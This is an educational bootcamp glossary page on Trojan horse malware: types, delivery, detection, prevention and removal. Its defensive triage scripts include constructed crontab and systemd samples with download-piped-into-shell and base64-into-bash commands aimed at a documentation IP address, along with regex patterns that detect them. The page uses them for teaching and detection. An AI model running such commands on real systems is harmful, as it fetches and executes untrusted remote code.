
Trojan Horse

A type of malware that disguises itself as legitimate software to trick users into installing it, then performs malicious actions such as stealing data, creating backdoors, or downloading additional malware.

Author
Unihackers Team

Why It Matters

The Trojan horse—named after the legendary Greek deception—represents one of the most effective and enduring attack vectors in cybersecurity. Unlike viruses or worms that spread automatically, trojans rely on human psychology. They exploit trust, curiosity, and the desire for free software to trick users into installing malicious code willingly.

Trojans account for a significant portion of all malware infections worldwide. From banking trojans that steal financial credentials to Remote Access Trojans (RATs) that give attackers complete control of systems, these threats target both individuals and organizations. Every day, thousands of users unknowingly install trojans disguised as legitimate software, games, or utilities.

For cybersecurity professionals, understanding trojans is essential. SOC analysts must recognize trojan indicators during incident investigations. Penetration testers use trojan techniques (ethically) to test organizational defenses. Security engineers design systems that prevent trojan execution. This knowledge directly protects organizations from one of the most prevalent threat categories.

The social engineering aspect of trojans makes user awareness equally important as technical defenses. No firewall can stop a user from deliberately installing malicious software they believe is legitimate.

How Trojan Horses Work

Trojans follow a deception-based attack model that exploits user trust:

  1. Disguise: The trojan is packaged to appear as legitimate software—a game, utility, cracked program, or document
  2. Delivery: Reaches victims via phishing emails, malicious websites, fake download sites, or compromised software
  3. Installation: User executes the file, believing it to be safe, granting the trojan access
  4. Payload Execution: Once installed, the trojan executes its malicious purpose
  5. Persistence: Establishes mechanisms to survive system reboots
  6. Concealment: Hides its presence from users and security software

Types of Trojan Horses

Remote Access Trojans (RATs)

RATs give attackers complete remote control over infected systems, essentially turning the victim's computer into a zombie they can control.

rat-capabilities.txt

Remote Access Trojan Capabilities:

System Control:
- Execute commands remotely
- Browse file system
- Modify/delete files
- Install additional malware

Surveillance:
- Capture screenshots
- Record keystrokes
- Activate webcam/microphone
- Monitor user activity

Data Theft:
- Steal passwords and credentials
- Exfiltrate documents
- Capture clipboard contents
- Harvest browser data

Notable RATs: njRAT, DarkComet, Remcos, Quasar

Banking Trojans

Specifically designed to steal financial credentials and intercept banking transactions.

Techniques:

  • Form grabbing: Captures data entered in browser forms
  • Web injection: Modifies banking websites in real-time to capture extra credentials
  • Session hijacking: Takes over active banking sessions
  • Two-factor authentication bypass: Intercepts SMS codes or authentication tokens

Notable examples: Zeus, Emotet, TrickBot, Dridex

Downloader Trojans

Initial infection vector that downloads and installs additional malware once inside the network.

Backdoor Trojans

Create hidden access points that bypass normal authentication, allowing attackers to return at will.

Characteristics:

  • Listens on specific ports for attacker connections
  • May use encrypted communications to avoid detection
  • Often survives removal of other malware components
  • Can persist through system updates

Rootkit Trojans

Combine trojan delivery with rootkit capabilities to hide deep within the operating system.

Hiding techniques:

  • Kernel-level hooking
  • Driver manipulation
  • Bootkit functionality (survives OS reinstalls)
  • Process and file hiding from security tools

Fake Antivirus Trojans (Scareware)

Pretend to be security software, displaying fake virus warnings to trick users into paying for "removal" or installing more malware.

fake-av-indicators.txt

Fake Antivirus Warning Signs:

- Unexpected security alerts from unknown software
- Claims of hundreds of "infections" found
- Demands immediate payment to "clean" system
- Browser hijacking to fake security sites
- Cannot be closed or uninstalled normally
- Legitimate antivirus is blocked or disabled

Information Stealers

Focus on harvesting specific types of valuable data for sale or exploitation.

Target data:

  • Browser-stored passwords
  • Cryptocurrency wallet credentials
  • Gaming platform accounts
  • Email and social media credentials
  • Corporate VPN credentials

Common Delivery Methods

Social Engineering Vectors

delivery-methods.txt

Trojan Delivery Methods:

Email-Based:
- Malicious attachments (documents, executables)
- Links to drive-by download sites
- Fake invoice or shipping notifications

Web-Based:
- Compromised legitimate websites
- Fake download portals
- Malvertising (malicious ads)
- Watering hole attacks

Software-Based:
- Pirated/cracked software
- Fake software updates
- Bundled with free utilities
- Compromised app stores

Physical:
- Infected USB drives
- Malicious QR codes
- Compromised hardware

Exploit Kits

Automated tools that scan visitors for vulnerabilities and deliver trojans via browser exploits.

Detection Methods

Behavioral Indicators

Signs that may indicate trojan infection:

  • Performance issues: Unexplained slowdowns, high CPU/memory usage
  • Network anomalies: Unexpected outbound connections, bandwidth usage
  • Security software problems: Antivirus disabled or blocked
  • Strange system behavior: Programs opening/closing, cursor moving
  • Unauthorized access: Unknown login attempts or account lockouts

Technical Detection

trojan-detection.sh

#!/usr/bin/env bash
# Quick host triage for the indicators listed above. Run as root for a
# complete view of sockets and processes, and review the output by hand.

# Check for suspicious network connections: established sessions and listeners
netstat -an | grep ESTABLISHED
lsof -i -P -n | grep LISTEN

# Review running processes, highest CPU first (macOS ps has no --sort: use "ps aux -r")
ps aux --sort=-%cpu | head -20

# Check startup programs (macOS launchd; on Linux: systemctl list-unit-files --state=enabled)
launchctl list

# Look for executables modified in the last 7 days
find /usr/local/bin -mtime -7 -type f 2>/dev/null

# Review scheduled tasks
crontab -l
ls -la /etc/cron.*

# Hash a suspicious file for a VirusTotal lookup (sha256sum on Linux, shasum on macOS)
sha256sum suspicious_file 2>/dev/null || shasum -a 256 suspicious_file
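The script above leaves the analyst to read raw socket listings by eye. The following Python is an added example, not code from the original page, that parses the output of the `lsof -i -P -n` command used in the script and applies the "network anomalies" indicators from the Behavioral Indicators list: established sessions to uncommon remote ports, scripting interpreters holding network sessions, hidden-looking process names, and listeners on ports the host is not expected to serve. The allowlists, the process-name heuristics and the sample lines are constructed for illustration and should be tuned to the host's real role.

```python
"""Triage 'lsof -i -P -n' output for trojan-style network anomalies.

Added example; the allowlists and SAMPLE_LSOF below are constructed.
"""
import re

# lsof columns: COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
# NAME is "local", optionally "->remote", optionally followed by "(STATE)".
LSOF_LINE = re.compile(
    r"^(?P<cmd>\S+)\s+(?P<pid>\d+)\s+(?P<user>\S+)\s+\S+\s+\S+\s+\S+\s+\S+\s+"
    r"(?P<proto>TCP|UDP)\s+(?P<local>\S+?)(?:->(?P<remote>\S+))?"
    r"(?:\s+\((?P<state>[A-Z_]+)\))?$"
)

# Remote ports an ordinary workstation talks to; anything else deserves a look.
# (Constructed allowlist: trojans do use 443, so this is a prompt, not a verdict.)
COMMON_REMOTE_PORTS = {22, 25, 53, 80, 110, 143, 443, 465, 587, 993, 995}
# Interpreters that rarely need a network session of their own on a workstation.
INTERPRETERS = {"python", "python3", "perl", "ruby", "bash", "sh", "zsh",
                "node", "powershell", "pwsh"}

# Constructed sample output; 203.0.113.9 is a documentation address.
SAMPLE_LSOF = """\
COMMAND   PID  USER  FD  TYPE DEVICE SIZE/OFF NODE NAME
sshd      812  root  3u  IPv4  18041     0t0  TCP *:22 (LISTEN)
firefox  2001  bob  45u  IPv4  20193     0t0  TCP 10.0.0.5:50112->142.250.74.78:443 (ESTABLISHED)
python3  3141  bob   3u  IPv4  20990     0t0  TCP 10.0.0.5:53122->203.0.113.9:4444 (ESTABLISHED)
.upd     4242  bob   4u  IPv4  21555     0t0  TCP *:31337 (LISTEN)
cupsd     650  root  5u  IPv4  17002     0t0  UDP *:631
"""


def port_of(endpoint: str):
    """'10.0.0.5:50112' -> 50112, '[::1]:22' -> 22, '*:443' -> 443, else None."""
    _host, sep, port = endpoint.rpartition(":")
    return int(port) if sep and port.isdigit() else None


def triage_sockets(lines, expected_listeners=frozenset()):
    """Return (pid, command, reason) tuples for lines worth an analyst's attention."""
    hits = []
    for raw in lines:
        m = LSOF_LINE.match(raw.strip())
        if not m:
            continue  # header line or an unrecognised format
        cmd, pid, state = m["cmd"], int(m["pid"]), m["state"]
        base = cmd.lower()
        reasons = []
        if base.startswith("."):
            reasons.append("hidden-looking process name")
        if state == "ESTABLISHED" and m["remote"]:
            rport = port_of(m["remote"])
            if rport is not None and rport not in COMMON_REMOTE_PORTS:
                reasons.append(f"established session to uncommon remote port {rport}")
            if base in INTERPRETERS:
                reasons.append(f"scripting interpreter {cmd} holds a network session")
        if state == "LISTEN":
            lport = port_of(m["local"])
            if lport is not None and lport not in expected_listeners:
                reasons.append(f"listener on unexpected port {lport}")
        hits.extend((pid, cmd, r) for r in reasons)
    return hits


if __name__ == "__main__":
    # A workstation that should only expose SSH.
    for pid, cmd, reason in triage_sockets(SAMPLE_LSOF.splitlines(), {22}):
        print(f"PID {pid:>5} {cmd:<10} {reason}")
```

On the constructed sample the sshd listener and the browser's HTTPS session pass, while the interpreter talking to port 4444 and the hidden ".upd" listener on 31337 are reported. An allowlisted port is not proof of legitimacy: a RAT beaconing over 443 passes this filter, which is why the EDR and network-monitoring tools in the next section correlate destination reputation and process lineage rather than port numbers alone.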

Security Tool Detection

  • Endpoint Detection and Response (EDR): Behavioral analysis catches trojans evading signatures
  • SIEM: Correlates trojan indicators across network
  • Network monitoring: Identifies command and control communications
  • Sandboxing: Analyzes suspicious files safely before execution

Prevention Strategies

Technical Controls

  • Email filtering: Block suspicious attachments at the gateway
  • Web filtering: Prevent access to known malicious sites
  • Application whitelisting: Only allow approved software to execute
  • Firewall rules: Block unauthorized outbound connections
  • Regular updates: Patch vulnerabilities trojans exploit

User Awareness

  • Verify software sources: Only download from official vendors
  • Recognize phishing: Don't click suspicious links or attachments
  • Avoid pirated software: Free often means compromised
  • Check file extensions: Be wary of executables disguised as documents
  • Use two-factor authentication: Limits damage if credentials are stolen
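The "check file extensions" advice above, and the email-gateway attachment filtering under Technical Controls, can both be automated. The following Python is an added example, not code from the original page: it flags executable and doubled extensions, compares the claimed document type with the file's real leading bytes (so an executable renamed to `.pdf` is caught), watches for the right-to-left override character that reverses how a name is displayed, and checks the SHA-256 against a blocklist. The extension sets, the blocklist and the sample files are constructed for illustration.

```python
"""Screen a file for the disguises trojans rely on before a user opens it.

Added example; extension lists, blocklist and sample files are constructed.
"""
import hashlib

# Extensions that execute when opened on a desktop OS (constructed, not exhaustive).
EXECUTABLE_EXTENSIONS = {"exe", "scr", "com", "pif", "msi", "bat", "cmd",
                         "js", "vbs", "hta", "ps1", "jar", "dmg", "pkg"}
# Extensions users read as harmless documents or images.
DOCUMENT_EXTENSIONS = {"pdf", "doc", "docx", "xls", "xlsx", "txt", "jpg", "png"}
# Bytes a genuine file of each claimed type starts with.
MAGIC = {
    "pdf": b"%PDF",
    "docx": b"PK\x03\x04", "xlsx": b"PK\x03\x04",          # OOXML is a zip container
    "doc": b"\xd0\xcf\x11\xe0", "xls": b"\xd0\xcf\x11\xe0",  # OLE2 container
    "png": b"\x89PNG", "jpg": b"\xff\xd8\xff",
}
# Native executable headers: Windows PE ("MZ"), Linux ELF, macOS Mach-O and fat binaries.
NATIVE_HEADERS = (b"MZ", b"\x7fELF", b"\xcf\xfa\xed\xfe", b"\xfe\xed\xfa\xcf", b"\xca\xfe\xba\xbe")
RLO = "\u202e"  # right-to-left override: reverses the displayed tail of a file name


def sha256_hex(content: bytes) -> str:
    return hashlib.sha256(content).hexdigest()


def screen_attachment(filename: str, content: bytes, blocklist=frozenset()) -> list:
    """Return human-readable findings; an empty list means nothing suspicious was seen."""
    findings = []
    exts = filename.lower().split(".")[1:]       # everything after the first dot
    last = exts[-1] if exts else ""

    if RLO in filename:
        findings.append("file name contains a right-to-left override character")
    if last in EXECUTABLE_EXTENSIONS:
        findings.append(f"executable extension .{last}")
        if len(exts) >= 2 and exts[-2] in DOCUMENT_EXTENSIONS:
            findings.append(f"double extension .{exts[-2]}.{last} disguises an executable as a document")

    head = content[:8]
    if head.startswith(NATIVE_HEADERS) and last not in EXECUTABLE_EXTENSIONS:
        findings.append(f"content is a native executable but the name claims .{last or '(none)'}")
    expected = MAGIC.get(last)
    if expected and not head.startswith(expected):
        findings.append(f"content does not start with the magic bytes of a .{last} file")

    digest = sha256_hex(content)
    if digest in blocklist:
        findings.append(f"sha256 {digest} is on the blocklist")
    return findings


if __name__ == "__main__":
    pe_stub = b"MZ\x90\x00" + b"\x00" * 60                 # constructed PE-looking header
    samples = {
        "invoice.pdf": b"%PDF-1.7\n%\xe2\xe3\xcf\xd3\n",  # looks like a real PDF
        "invoice.pdf.exe": pe_stub,                       # double extension
        "statement.pdf": pe_stub,                         # executable renamed to .pdf
        "photo.png": b"\x89PNG\r\n\x1a\n",
    }
    blocklist = {sha256_hex(pe_stub)}                     # constructed threat-intel feed
    for name, data in samples.items():
        verdict = screen_attachment(name, data, blocklist)
        print(f"{name}: {'QUARANTINE: ' + '; '.join(verdict) if verdict else 'clean'}")
```

The magic-byte check is deliberately shallow: a `.docx` only has to start like a zip archive, so a macro-laden document passes it, and a PDF with embedded JavaScript passes too. It catches the renamed-executable disguise the list above warns about, not document-borne payloads; those belong to the sandboxing tools in the Detection section.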

Organizational Measures

  • Security training: Regular education on trojan threats
  • Least privilege: Limit what users can install
  • Network segmentation: Contain potential infections
  • Incident response plans: Prepare for trojan discovery
  • Backup strategies: Maintain offline backups for recovery

Removal and Recovery

Immediate Steps

  1. Isolate the system: Disconnect from network to prevent data exfiltration
  2. Boot into safe mode: Limit what runs during investigation
  3. Preserve evidence: Document before making changes
  4. Run multiple scanners: Different tools catch different threats
  5. Check persistence mechanisms: Startup items, scheduled tasks, services
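Step 5, checking persistence mechanisms, is where a trojan usually leaves its clearest trace. The following Python is an added example, not code from the original page or a tool the page names: it parses a crontab and scores each command for habits common to trojan persistence (a download piped straight into a shell, a base64 blob decoded into a shell, a bare-IP download URL, a binary living in a temp or hidden directory, a shell one-liner hidden behind `-c`). Because the scoring works on the command string alone, the same `suspicious_command` function can be run over a systemd `ExecStart=` line or the joined `ProgramArguments` of a launchd plist, which the example also shows. The patterns and all sample entries are constructed for illustration.

```python
"""Score persistence entries (crontab, systemd, launchd) for trojan-style commands.

Added example; the heuristics and SAMPLE_CRONTAB are constructed.
"""
import re

# Each check is (label, pattern); a command gets one finding per matching check.
CHECKS = [
    ("download piped into a shell",
     re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z|da)?sh\b")),
    ("base64 payload decoded into a shell",
     re.compile(r"base64\s+(-d|--decode)[^|;&]*\|\s*(sudo\s+)?(ba|z|da)?sh\b")),
    ("download from a bare IP address",
     re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}")),
    ("binary in a world-writable or hidden directory",
     re.compile(r"(^|[\s=])(/tmp|/var/tmp|/dev/shm)/\S*|/\.[^\s/]+")),
    ("shell one-liner hidden behind -c",
     re.compile(r"\b(ba|z)?sh\s+-c\s+['\"]")),
]

# Constructed crontab; 203.0.113.9 is a documentation address.
SAMPLE_CRONTAB = """\
# m h dom mon dow command   (constructed sample)
PATH=/usr/local/bin:/usr/bin:/bin
0 * * * * /usr/bin/certbot renew --quiet
*/5 * * * * curl -s http://203.0.113.9/u.sh | sh
@reboot /tmp/.X11-unix/.upd -d
30 2 * * * echo cHl0aG9uMyAtYyAuLi4= | base64 -d | bash
0 3 * * * /home/bob/.local/bin/backup.sh
"""


def suspicious_command(command: str) -> list:
    """Labels of every check the command trips; empty when nothing matched."""
    return [label for label, pattern in CHECKS if pattern.search(command)]


def split_cron_entry(line: str):
    """(schedule, command) for a crontab line; None for comments, blanks and VAR=value lines."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if line.startswith("@"):                      # @reboot, @daily, ...
        parts = line.split(None, 1)
        return parts[0], (parts[1] if len(parts) > 1 else "")
    fields = line.split(None, 5)                  # five schedule fields, then the command
    if len(fields) < 6:
        return None                               # environment assignment or malformed line
    return " ".join(fields[:5]), fields[5]


def triage_crontab(text: str) -> list:
    """(schedule, command, reasons) for every entry that trips at least one check."""
    hits = []
    for line in text.splitlines():
        entry = split_cron_entry(line)
        if entry is None:
            continue
        schedule, command = entry
        reasons = suspicious_command(command)
        if reasons:
            hits.append((schedule, command, reasons))
    return hits


if __name__ == "__main__":
    for schedule, command, reasons in triage_crontab(SAMPLE_CRONTAB):
        print(f"[{schedule}] {command}\n    -> {'; '.join(reasons)}")
    # The same scoring applied to a constructed systemd unit line and launchd arguments.
    exec_start = "ExecStart=/bin/bash -c 'curl http://203.0.113.9/a | bash'"
    print(exec_start, "->", suspicious_command(exec_start.split("=", 1)[1]))
    program_arguments = ["/usr/bin/python3", "/var/tmp/.cache/sync.py"]
    print(program_arguments, "->", suspicious_command(" ".join(program_arguments)))
```

The hits are prompts for the "document before making changes" step, not verdicts: the constructed `backup.sh` under `~/.local/bin` is flagged only because of the hidden directory, and an analyst confirms it against the user's own setup before removing anything. Entries that pass, such as the certbot renewal, still deserve a glance at the binary's hash and modification time, since a trojan can also replace a legitimately scheduled program.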

Complete Remediation

removal-checklist.txt

Trojan Removal Checklist:

Containment:
[ ] Disconnect from network
[ ] Document running processes
[ ] Capture network connections
[ ] Back up critical data (verify clean)

Analysis:
[ ] Run full antivirus scan
[ ] Use anti-malware tools (Malwarebytes, etc.)
[ ] Check browser extensions
[ ] Review startup programs
[ ] Examine scheduled tasks
[ ] Check user accounts for additions

Post-Removal:
[ ] Change ALL passwords (from clean device)
[ ] Enable two-factor authentication
[ ] Monitor financial accounts
[ ] Update all software
[ ] Review what data may have been compromised
[ ] Consider full system reinstall for severe infections

Career Connection

Understanding trojans is fundamental for multiple cybersecurity roles. Malware analysts reverse-engineer trojans to understand their capabilities. SOC analysts detect and respond to trojan infections daily. Threat intelligence analysts track trojan campaigns and attribute them to threat actors. Penetration testers use similar techniques (ethically) to test defenses.

Trojan-Related Roles (US Market)

Role                          Entry Level   Mid Level   Senior
SOC Analyst                   $55,000       $75,000     $100,000
Malware Analyst               $80,000       $110,000    $145,000
Incident Responder            $70,000       $95,000     $125,000
Threat Intelligence Analyst   $85,000       $115,000    $150,000

Source: CyberSeek

In the Bootcamp

How We Teach Trojan Horse

In our Cybersecurity Bootcamp, you won't just learn about Trojan horses in theory. You'll practice with real tools in hands-on labs, guided by industry professionals who use these concepts daily.

Covered in:

Module 1: Cybersecurity Foundations

Related topics you'll master: CIA Triad, Threat Vectors, NIST Framework, ISO 27001
